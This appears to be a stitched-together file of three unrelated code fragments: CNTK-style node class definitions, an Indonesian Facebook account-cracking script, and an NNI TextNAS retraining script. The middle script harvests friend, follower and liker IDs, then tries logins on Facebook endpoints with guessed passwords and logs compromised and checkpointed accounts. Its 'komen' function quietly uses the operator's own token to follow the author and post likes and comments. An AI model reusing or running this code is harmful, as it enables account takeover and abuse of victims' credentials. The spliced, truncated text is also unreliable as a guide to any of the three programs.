super(BatchNormalization, self).__init__(params=['input', 'scale', 'bias', 'runMean', 'runInvStdDev', 'eval', 'spatial', 'normalizationTimeConstant', 'epsilon', 'useCntkEngine', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.scale = scale
self.bias = bias
self.runMean = runMean
self.runInvStdDev = runInvStdDev
self.eval = eval
self.spatial = spatial
self.normalizationTimeConstant = normalizationTimeConstant
self.epsilon = epsilon
self.useCntkEngine = useCntkEngine
self.imageLayout = imageLayout
self.params_with_defaults = ['normalizationTimeConstant', 'epsilon', 'useCntkEngine', 'imageLayout']
class Abs(ComputationNode):
def __init__(self, x, name='Abs', var_name=None):
super(Abs, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class ClassBasedCrossEntropyWithSoftmax(ComputationNode):
def __init__(self, labelClassDescriptorVectorSequence, mainInputInfo, mainWeight, classLogProbsBeforeSoftmax, name='ClassBasedCrossEntropyWithSoftmax', var_name=None):
super(ClassBasedCrossEntropyWithSoftmax, self).__init__(params=['labelClassDescriptorVectorSequence', 'mainInputInfo', 'mainWeight', 'classLogProbsBeforeSoftmax'], name=name, var_name=var_name)
self.labelClassDescriptorVectorSequence = labelClassDescriptorVectorSequence
self.mainInputInfo = mainInputInfo
self.mainWeight = mainWeight
self.classLogProbsBeforeSoftmax = classLogProbsBeforeSoftmax
self.params_with_defaults = []
class ColumnElementTimes(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, name='ColumnElementTimes', var_name=None):
super(ColumnElementTimes, self).__init__(params=['aVectorSequence', 'anotherVectorSequence'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.params_with_defaults = []
class CosDistance(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, name='CosDistance', var_name=None):
super(CosDistance, self).__init__(params=['aVectorSequence', 'anotherVectorSequence'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.params_with_defaults = []
class CosDistanceWithNegativeSamples(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, numShifts, numNegSamples, name='CosDistanceWithNegativeSamples', var_name=None):
super(CosDistanceWithNegativeSamples, self).__init__(params=['aVectorSequence', 'anotherVectorSequence', 'numShifts', 'numNegSamples'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.numShifts = numShifts
self.numNegSamples = numNegSamples
self.params_with_defaults = []
class Cosine(ComputationNode):
def __init__(self, x, name='Cosine', var_name=None):
super(Cosine, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class CrossEntropy(ComputationNode):
def __init__(self, refProbVectorSequence, outProbVectorSequence, name='CrossEntropy', var_name=None):
super(CrossEntropy, self).__init__(params=['refProbVectorSequence', 'outProbVectorSequence'], name=name, var_name=var_name)
self.refProbVectorSequence = refProbVectorSequence
self.outProbVectorSequence = outProbVectorSequence
self.params_with_defaults = []
class CrossEntropyWithSoftmax(ComputationNode):
def __init__(self, labelVectorSequence, outProbVectorSequence, name='CrossEntropyWithSoftmax', var_name=None):
super(CrossEntropyWithSoftmax, self).__init__(params=['labelVectorSequence', 'outProbVectorSequence'], name=name, var_name=var_name)
self.labelVectorSequence = labelVectorSequence
self.outProbVectorSequence = outProbVectorSequence
self.params_with_defaults = []
class DiagTimes(ComputationNode):
def __init__(self, diagonalMatrixAsColumnVector, matrix, name='DiagTimes', var_name=None):
super(DiagTimes, self).__init__(params=['diagonalMatrixAsColumnVector', 'matrix'], name=name, var_name=var_name)
| |
"#-*-coding:utf-8-*-
import requests,bs4,sys,os,subprocess
import requests,sys,random,time,re,base64,json
reload(sys)
sys.setdefaultencoding("utf-8")
from multiprocessing.pool import ThreadPool
if ("linux" in sys.platform.lower()):
##### WARNA #####
P = '\033[0;97m' # Putih
M = '\033[0;91m' # Merah
H = '\033[0;92m' # Hijau
K = '\033[0;93m' # Kuning
B = '\033[0;94m' # Biru
U = '\033[0;95m' # Ungu
O = '\033[0;96m' # Biru Muda
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
host="https://mbasic.facebook.com"
##### RANDOM #####
ua = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'
##### LOGO #####
logo = """
__ __ ____ _____
| \/ | __ )| ___| *au : rozhak
| |\/| | _ \| |_ *fb : fb.com/rozhak.xyz
| | | | |_) | _| *gh : github.com/r0zhak
|_| |_|____/|_| *yt : youtube.com/rozhakid
"""
ips=None
try:
b=requests.get("https://api.ipify.org").text.strip()
ips=requests.get("https://ipapi.com/ip_api.php?ip="+b,headers={"Referer":"https://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}).json()["country_name"].lower()
except:
ips=None
uas=None
if os.path.exists(".browser"):
if os.path.getsize(".browser") !=0:
uas=open(".browser").read().strip()
mbasic_h={"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
free_h={"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
mfb_h={'Host': 'm.facebook.<EMAIL>', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent':ua, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
##### CLEAR #####
def clear():
if " linux" in sys.platform.lower():
os.system("clear")
elif "win" in sys.platform.lower():
os.system("cls")
else:os.system("clear")
##### KELUAR #####
def keluar():
print ( ' *! Keluar')
os.sys.exit()
##### JALAN #####
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
pantun = random.choice(["mantap.",
keren.",
boleh juga."])
def komen(): # Boleh Di Tanbahin Jangan Di Ganti #
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
login()
kom = '👍\n'+pantun
kom2 = '👍\n'+pantun
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=Keren Bang ❤️&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
print (' *! Login Berhasil')
menu()
##### LOGIN #####
def login():
os.system('clear')
print logo
print "\n *! Ketik *T* Jika Login Menggunakan Token"
print " *! Ketik *C* Jika Login Menggunakan Cookie"
lg = raw_input('\n *-> Input : ')
if lg == '':
os.sys.exit()
elif lg == 'T' or lg == 't':
toket = raw_input(" *-> Token : ") # Login Token
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
komen()
except KeyError:
print (" *! Token Salah")
time.sleep(1.7)
login()
except requests.exceptions.SSLError:
print (" *! Tidak Ada Koneksi")
exit()
elif lg == 'C' or lg == 'c':
try:
cookie = raw_input(" *-> Cookie : ")
data = {
'user-agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36', # don't change this user agent.
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8',
'cookie' : cookie }
coki = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = data)
cari = re.search('(EAAA\w+)', coki.text)
hasil = cari.group(1)
pup = open('coki.log', 'w')
pup.write(cookie)
pup.close()
pip = open('login.txt', 'w')
pip.write(hasil)
pip.close()
komen()
except AttributeError:
print ' *! Cookie Salah'
time.sleep(3)
login()
except UnboundLocalError:
print ' *! Cookie Salah'
time.sleep(3)
login()
except requests.exceptions.SSLError:
print ' *! Tidak Ada Koneksi'
exit()
elif lg == '0' or lg == '00':
os.sys.exit()
else:
exit(' *! Isi Dengan Benar')
##### MENU #####
def menu():
try:
toket = open('login.txt','r').read()
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nm = a['name']
id = a['id']
tl = a['birthday'].replace("/","-")
except Exception as e:
print (' *! Token Invalid')
time.sleep(1)
login()
except KeyError:
print (' *! Token Invalid')
time.sleep(1)
os.system('rm -rf login.txt')
login()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada koneksi')
os.sys.exit()
except Exception as e:
print (' *! Token Invalid')
time.sleep(1)
login()
os.system("clear")
print logo
print ('\n *•> Nama : '+nm)
print (' *•> Akun ID : '+id)
print (' *•> Tanggal Lahir : '+tl)
print ('\n *1 Crack ID Dari Teman')
print (' *2 Crack ID Dari Publik')
print (' *3 Crack ID Dari Followers')
print (' *4 Crack ID Dari Like')
print (' *5 Lihat Hasil Crack')
print (' *0 Keluar (Hapus Token/Cookies)\n')
mn=raw_input(" *-> Input : ")
if mn=="":
print (' *! Isi Dengan Benar')
menu()
elif mn=="1":
teman()
elif mn=="2":
publik()
elif mn=="3":
followers()
elif mn=="4":
like()
elif mn=="5":
print ('\n *1 Lihat Hasil Ok')
print (' *2 Lihat Hasil Cp')
print (' *0 Kembali\n')
hs = raw_input(' *-> Input : ')
if hs == '':
menu()
elif hs == '1' or hs == '01':
ok()
elif hs == '2' or hs == '02':
cp()
else:
exit(' *! Isi Dengan Benar')
elif mn=="0":
try:
os.remove("login.txt")
print (' *! Berhasil Menghapus Token/Cookies')
os.sys.exit()
except Exception as e:
print (' *! File Tidak Ada')
os.sys.exit()
else:
print (' *! Isi Dengan Benar')
menu()
def ok():
try:
ok=open('Ok.txt','r').read()
print ' '
print ok
except KeyError,IOError:
print (' *! Hasil Ok Tidak Ada')
os.sys.exit()
except Exception as e:
print (' *! Hasil Ok Tidak Ada')
os.sys.exit()
def cp():
try:
cp=open('Cp.txt','r').read()
print ' '
print cp
except KeyError,IOError:
print (' *! Hasil Cp Tidak Ada')
os.sys.exit()
except Exception as e:
print (' *! Hasil Cp Tidak Ada')
os.sys.exit()
##### CRACK TEMAN #####
def teman():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
limit = '5000'
file = 'dump.txt'
try:
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket+"&limit="+limit)
except KeyError:
print (' *! Tidak Ada Teman')
raw_input(" *Kembali")
menu()
id = []
z=json.loads(r.text)
qq = ('teman.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpukan %s ID\r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print " "
print("\r *-> Total ID : %s "%(len(id)))
metode()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK FOLLOWERS #####
def followers():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Profil ID : ")
limit = '5000'
file = 'dump.txt'
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print(" *-> Nama : "+op["name"])
except KeyError:
print (' *! ID Tidak Ditemukan')
raw_input(" *Kembali")
menu()
r=requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+toket+"&limit="+limit)
id = []
z=json.loads(r.text)
qq = ('flw.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpukan %s ID\r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except KeyError:
print(' *! Tidak Ada Followers')
raw_input(' *Kembali')
menu()
except requests.exceptions.ConnectionError:
print(' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK LIKE #####
def like():
try:
toket=open('login.txt','r').read()
except IOError:
print(' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Post ID : ")
limit = '5000'
file = 'dump.txt'
try:
r=requests.get("https://graph.facebook.com/"+idt+"/likes?limit="+limit+"&access_token="+toket)
except KeyError:
print (' *! Post ID Tidak Ada')
raw_input(" *Kembali")
menu()
id = []
z=json.loads(r.text)
qq = ('likess.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpulkan %s ID \r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except KeyError:
print (' *! Harus Berupa ID Postingan')
raw_input(' *Kembali')
menu()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK PUBLIK #####
def publik():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Profil ID : ")
limit = '5000'
file = 'dump.txt'
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print(" *-> Nama : "+op["name"])
except KeyError:
print(' *! Profil ID Tidak Ada')
raw_input(" *Kembali")
menu
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit("+limit+")&access_token="+toket)
id = []
z=json.loads(r.text)
qq = ('pblk.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['friends']['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpulkan %s ID"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except Exception as e:
print(' *! Tidak Ada Teman')
menu()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
def mbasic(em,pas,hosts):
global ua,mbasic_h
r=requests.Session()
r.headers.update(mbasic_h)
p=r.get("https://mbasic.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}#crack mbasic
def mfb(em,pas,hosts):
global ua,mfb_h
r = requests.Session()
r.headers.update(mfb_h)
p = r.get('https://m.facebook.com/')
b = bs4.BeautifulSoup(p.text, 'html.parser')
dtg = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for i in b('input'):
if i.get('value') is None:
if i.get('name') == 'email':
data.update({'email': em})
elif i.get('name') == 'pass':
data.update({'pass': pas})
else:
data.update({i.get('name'): ''})
else:
data.update({i.get('name'): i.get('value')})
data.update({'fb_dtsg': dtg, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
r.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = r.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if 'c_user' in r.cookies.get_dict().keys():
return {'status': 'success', 'email': em, 'pass': <PASSWORD>, 'cookies': r.cookies.get_dict()}
else:
if 'checkpoint' in r.cookies.get_dict().keys():
return {'status': 'cp', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
return {'status': 'error', 'email': em, 'pass': <PASSWORD>}
return
def free(em,pas,hosts):
global ua,free_h
r=requests.Session()
r.headers.update(free_h)
p=r.get("https://free.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def metode():
print ('\n *1 Metode Login mbasic.facebook')
print (' *2 Metode Login m.facebook')
print (' *3 Metode | |
# Repo: dutxubo/nni, file: examples/nas/legacy/textnas/retrain.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import sys
import os
import logging
import pickle
import shutil
import random
import math
import time
import datetime
import argparse
import distutils.util
import numpy as np
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
import torch.nn.functional as Func
from model import Model
from nni.nas.pytorch.fixed import apply_fixed_architecture
from dataloader import read_data_sst
logger = logging.getLogger("nni.textnas")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--reset_output_dir",
type=distutils.util.strtobool,
default=True,
help="Whether to clean the output dir if existed. (default: %(default)s)")
parser.add_argument(
"--child_fixed_arc",
type=str,
required=True,
help="Architecture json file. (default: %(default)s)")
parser.add_argument(
"--data_path",
type=str,
default="data",
help="Directory containing the dataset and embedding file. (default: %(default)s)")
parser.add_argument(
"--output_dir",
type=str,
default="output",
help="The output directory. (default: %(default)s)")
parser.add_argument(
"--child_lr_decay_scheme",
type=str,
default="cosine",
help="Learning rate annealing strategy, only 'cosine' supported. (default: %(default)s)")
parser.add_argument(
"--batch_size",
type=int,
default=128,
help="Number of samples each batch for training. (default: %(default)s)")
parser.add_argument(
"--eval_batch_size",
type=int,
default=128,
help="Number of samples each batch for evaluation. (default: %(default)s)")
parser.add_argument(
"--class_num",
type=int,
default=5,
help="The number of categories. (default: %(default)s)")
parser.add_argument(
"--global_seed",
type=int,
default=1234,
help="Seed for reproduction. (default: %(default)s)")
parser.add_argument(
"--max_input_length",
type=int,
default=64,
help="The maximum length of the sentence. (default: %(default)s)")
parser.add_argument(
"--num_epochs",
type=int,
default=10,
help="The number of training epochs. (default: %(default)s)")
parser.add_argument(
"--child_num_layers",
type=int,
default=24,
help="The layer number of the architecture. (default: %(default)s)")
parser.add_argument(
"--child_out_filters",
type=int,
default=256,
help="The dimension of hidden states. (default: %(default)s)")
parser.add_argument(
"--child_out_filters_scale",
type=int,
default=1,
help="The scale of hidden state dimension. (default: %(default)s)")
parser.add_argument(
"--child_lr_T_0",
type=int,
default=10,
help="The length of one cycle. (default: %(default)s)")
parser.add_argument(
"--child_lr_T_mul",
type=int,
default=2,
help="The multiplication factor per cycle. (default: %(default)s)")
parser.add_argument(
"--min_count",
type=int,
default=1,
help="The threshold to cut off low frequent words. (default: %(default)s)")
parser.add_argument(
"--train_ratio",
type=float,
default=1.0,
help="The sample ratio for the training set. (default: %(default)s)")
parser.add_argument(
"--valid_ratio",
type=float,
default=1.0,
help="The sample ratio for the dev set. (default: %(default)s)")
parser.add_argument(
"--child_grad_bound",
type=float,
default=5.0,
help="The threshold for gradient clipping. (default: %(default)s)")
parser.add_argument(
"--child_lr",
type=float,
default=0.02,
help="The initial learning rate. (default: %(default)s)")
parser.add_argument(
"--cnn_keep_prob",
type=float,
default=0.8,
help="Keep prob for cnn layer. (default: %(default)s)")
parser.add_argument(
"--final_output_keep_prob",
type=float,
default=1.0,
help="Keep prob for the last output layer. (default: %(default)s)")
parser.add_argument(
"--lstm_out_keep_prob",
type=float,
default=0.8,
help="Keep prob for the RNN layer. (default: %(default)s)")
parser.add_argument(
"--embed_keep_prob",
type=float,
default=0.8,
help="Keep prob for the embedding layer. (default: %(default)s)")
parser.add_argument(
"--attention_keep_prob",
type=float,
default=0.8,
help="Keep prob for the self-attention layer. (default: %(default)s)")
parser.add_argument(
"--child_l2_reg",
type=float,
default=3e-6,
help="Weight decay factor. (default: %(default)s)")
parser.add_argument(
"--child_lr_max",
type=float,
default=0.002,
help="The max learning rate. (default: %(default)s)")
parser.add_argument(
"--child_lr_min",
type=float,
default=0.001,
help="The min learning rate. (default: %(default)s)")
parser.add_argument(
"--child_optim_algo",
type=str,
default="adam",
help="Optimization algorithm. (default: %(default)s)")
parser.add_argument(
"--checkpoint_dir",
type=str,
default="best_checkpoint",
help="Path for saved checkpoints. (default: %(default)s)")
parser.add_argument(
"--output_type",
type=str,
default="avg",
help="Opertor type for the time steps reduction. (default: %(default)s)")
parser.add_argument(
"--multi_path",
type=distutils.util.strtobool,
default=False,
help="Search for multiple path in the architecture. (default: %(default)s)")
parser.add_argument(
"--is_binary",
type=distutils.util.strtobool,
default=False,
help="Binary label for sst dataset. (default: %(default)s)")
parser.add_argument(
"--is_cuda",
type=distutils.util.strtobool,
default=True,
help="Specify the device type. (default: %(default)s)")
parser.add_argument(
"--is_mask",
type=distutils.util.strtobool,
default=True,
help="Apply mask. (default: %(default)s)")
parser.add_argument(
"--fixed_seed",
type=distutils.util.strtobool,
default=True,
help="Fix the seed. (default: %(default)s)")
parser.add_argument(
"--load_checkpoint",
type=distutils.util.strtobool,
default=False,
help="Wether to load checkpoint. (default: %(default)s)")
parser.add_argument(
"--log_every",
type=int,
default=50,
help="How many steps to log. (default: %(default)s)")
parser.add_argument(
"--eval_every_epochs",
type=int,
default=1,
help="How many epochs to eval. (default: %(default)s)")
global FLAGS
FLAGS = parser.parse_args()
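# A minimal example invocation for this retraining script (illustrative only: the architecture
# JSON path and data directory below are assumptions, not files shipped with the script):
#   python retrain.py --child_fixed_arc ./arch/final_arc.json --data_path data --output_dir output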
def set_random_seed(seed):
logger.info("set random seed for data reading: {}".format(seed))
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
if FLAGS.is_cuda:
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
def get_model(embedding, num_layers):
logger.info("num layers: {0}".format(num_layers))
assert FLAGS.child_fixed_arc is not None, "Architecture should be provided."
child_model = Model(
embedding=embedding,
hidden_units=FLAGS.child_out_filters_scale * FLAGS.child_out_filters,
num_layers=num_layers,
num_classes=FLAGS.class_num,
choose_from_k=5 if FLAGS.multi_path else 1,
lstm_keep_prob=FLAGS.lstm_out_keep_prob,
cnn_keep_prob=FLAGS.cnn_keep_prob,
att_keep_prob=FLAGS.attention_keep_prob,
att_mask=FLAGS.is_mask,
embed_keep_prob=FLAGS.embed_keep_prob,
final_output_keep_prob=FLAGS.final_output_keep_prob,
global_pool=FLAGS.output_type)
apply_fixed_architecture(child_model, FLAGS.child_fixed_arc)
return child_model
def eval_once(child_model, device, eval_set, criterion, valid_dataloader=None, test_dataloader=None):
if eval_set == "test":
assert test_dataloader is not None
dataloader = test_dataloader
elif eval_set == "valid":
assert valid_dataloader is not None
dataloader = valid_dataloader
else:
raise NotImplementedError("Unknown eval_set '{}'".format(eval_set))
tot_acc = 0
tot = 0
losses = []
with torch.no_grad(): # save memory
for batch in dataloader:
(sent_ids, mask), labels = batch
sent_ids = sent_ids.to(device, non_blocking=True)
mask = mask.to(device, non_blocking=True)
labels = labels.to(device, non_blocking=True)
logits = child_model((sent_ids, mask)) # run
loss = criterion(logits, labels.long())
loss = loss.mean()
preds = logits.argmax(dim=1).long()
acc = torch.eq(preds, labels.long()).long().sum().item()
losses.append(loss)
tot_acc += acc
tot += len(labels)
losses = torch.tensor(losses)
loss = losses.mean()
if tot > 0:
final_acc = float(tot_acc) / tot
else:
final_acc = 0
logger.info("Error in calculating final_acc")
return final_acc, loss
def print_user_flags(FLAGS, line_limit=80):
log_strings = "\n" + "-" * line_limit + "\n"
for flag_name in sorted(vars(FLAGS)):
value = "{}".format(getattr(FLAGS, flag_name))
log_string = flag_name
log_string += "." * (line_limit - len(flag_name) - len(value))
log_string += value
log_strings = log_strings + log_string
log_strings = log_strings + "\n"
log_strings += "-" * line_limit
logger.info(log_strings)
def count_model_params(trainable_params):
num_vars = 0
for var in trainable_params:
num_vars += np.prod([dim for dim in var.size()])
return num_vars
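# For reference, the loop above is equivalent to sum(p.numel() for p in trainable_params).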
def update_lr(
optimizer,
epoch,
l2_reg=1e-4,
lr_warmup_val=None,
lr_init=0.1,
lr_decay_scheme="cosine",
lr_max=0.002,
lr_min=0.000000001,
lr_T_0=4,
lr_T_mul=1,
sync_replicas=False,
num_aggregate=None,
num_replicas=None):
if lr_decay_scheme == "cosine":
assert lr_max is not None, "Need lr_max to use lr_cosine"
assert lr_min is not None, "Need lr_min to use lr_cosine"
assert lr_T_0 is not None, "Need lr_T_0 to use lr_cosine"
assert lr_T_mul is not None, "Need lr_T_mul to use lr_cosine"
T_i = lr_T_0
t_epoch = epoch
last_reset = 0
while True:
t_epoch -= T_i
if t_epoch < 0:
break
last_reset += T_i
T_i *= lr_T_mul
T_curr = epoch - last_reset
def _update():
rate = T_curr / T_i * 3.1415926
lr = lr_min + 0.5 * (lr_max - lr_min) * (1.0 + math.cos(rate))
return lr
learning_rate = _update()
else:
raise ValueError("Unknown learning rate decay scheme {}".format(lr_decay_scheme))
#update lr in optimizer
for params_group in optimizer.param_groups:
params_group['lr'] = learning_rate
return learning_rate
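# A worked example of the cosine warm-restart schedule above, assuming the script defaults
# (lr_T_0=10, lr_T_mul=2, lr_max=0.002, lr_min=0.001):
#   epoch 0  -> T_i=10, T_curr=0  -> lr = lr_max            = 0.0020
#   epoch 5  -> T_i=10, T_curr=5  -> lr = (lr_max+lr_min)/2 = 0.0015
#   epoch 10 -> new cycle, T_i=20, T_curr=0 -> lr = lr_max  = 0.0020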
def train(device, data_path, output_dir, num_layers):
logger.info("Build dataloader")
train_dataset, valid_dataset, test_dataset, embedding = \
read_data_sst(data_path,
FLAGS.max_input_length,
FLAGS.min_count,
train_ratio=FLAGS.train_ratio,
valid_ratio=FLAGS.valid_ratio,
is_binary=FLAGS.is_binary)
train_dataloader = DataLoader(train_dataset, batch_size=FLAGS.batch_size, shuffle=True, pin_memory=True)
test_dataloader = DataLoader(test_dataset, batch_size=FLAGS.eval_batch_size, pin_memory=True)
valid_dataloader = DataLoader(valid_dataset, batch_size=FLAGS.eval_batch_size, pin_memory=True)
logger.info("Build model")
child_model = get_model(embedding, num_layers)
logger.info("Finish build model")
